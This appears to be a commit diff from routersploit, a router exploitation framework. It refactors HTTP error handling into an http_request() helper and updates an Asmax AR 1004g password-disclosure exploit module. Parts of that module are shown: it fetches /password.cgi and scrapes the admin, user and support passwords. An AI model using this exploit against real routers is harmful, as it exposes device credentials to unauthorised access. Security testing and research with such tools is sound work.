Adding http_request() idea.

121eed79 · fwkz · 6321f085 · 121eed79 · 121eed79 · 121eed79
Commit 121eed79 authored Apr 16, 2016 by fwkz
Showing with 33 additions and 16 deletions

__init__.py routersploit/__init__.py +7 -2

ar_1004g_password_disclosure.py ...it/modules/exploits/asmax/ar_1004g_password_disclosure.py +5 -9

utils.py routersploit/utils.py +21 -5

No files found.
--- a/routersploit/__init__.py
+++ b/routersploit/__init__.py
 from routersploit.utils import (
-    print_error, print_status, print_success,
-    print_table, print_info, sanitize_url,
+    print_error,
+    print_status,
+    print_success,
+    print_table,
+    print_info,
+    sanitize_url,
    LockedIterator,
+    http_request,
 )

 from routersploit import exploits

--- a/routersploit/modules/exploits/asmax/ar_1004g_password_disclosure.py
+++ b/routersploit/modules/exploits/asmax/ar_1004g_password_disclosure.py
-import requests
 import re

 from routersploit import (
@@ -8,6 +7,7 @@ from routersploit import (
    print_error,
    print_success,
    print_table,
+    http_request,
 )


@@ -40,12 +40,8 @@ class Exploit(exploits.Exploit):

        print_status("Requesting for {}".format(url))
        try:
-            response = requests.get(url).text
-        except (requests.exceptions.MissingSchema, requests.exceptions.InvalidSchema):
-            print_error("Invalid URL format: {}".format(url))
-            return
-        except requests.exceptions.ConnectionError:
-            print_error("Connection error: {}".format(url))
+            response = http_request(method="GET", url=url).text
+        except AttributeError:
            return

        admin = re.findall("pwdAdmin = '(.+?)'", response)
@@ -70,8 +66,8 @@ class Exploit(exploits.Exploit):
        url = sanitize_url("{}:{}/password.cgi".format(self.target, self.port))

        try:
-            response = requests.get(url).text
-        except:
+            response = http_request(method="GET", url=url).text
+        except AttributeError:
            return None  # could not be verified

        if any(map(lambda x: x in response, ["pwdSupport", "pwdUser", "pwdAdmin"])):

--- a/routersploit/utils.py
+++ b/routersploit/utils.py
@@ -3,6 +3,8 @@ import threading
 from functools import wraps
 import sys

+import requests
+

 print_lock = threading.Lock()

@@ -194,12 +196,10 @@ def sanitize_url(address):

    Converts address to valid HTTP url.
    """
-    if not address.startswith("http://") and not address.startswith("https://"):
-        url = "http://" + address
+    if address.startswith("http://") or address.startswith("https://"):
+        return address
    else:
-        url = address
-
-    return url
+        return "http://{}".format(address)


 def pprint_dict_in_order(dictionary, order=None):
@@ -243,3 +243,19 @@ def pprint_dict_in_order(dictionary, order=None):

    for rest_keys in keys:
        prettyprint(rest_keys, dictionary[rest_keys])
+
+
+def http_request(method, url, **kwargs):
+    """ Wrapper for 'requests' silencing exceptions a little bit. """
+
+    try:
+        return getattr(requests, method.lower())(url, **kwargs)
+    except (requests.exceptions.MissingSchema, requests.exceptions.InvalidSchema):
+        print_error("Invalid URL format: {}".format(url))
+        return
+    except requests.exceptions.ConnectionError:
+        print_error("Connection error: {}".format(url))
+        return
+    except requests.RequestException as error:
+        print_error(error)
+        return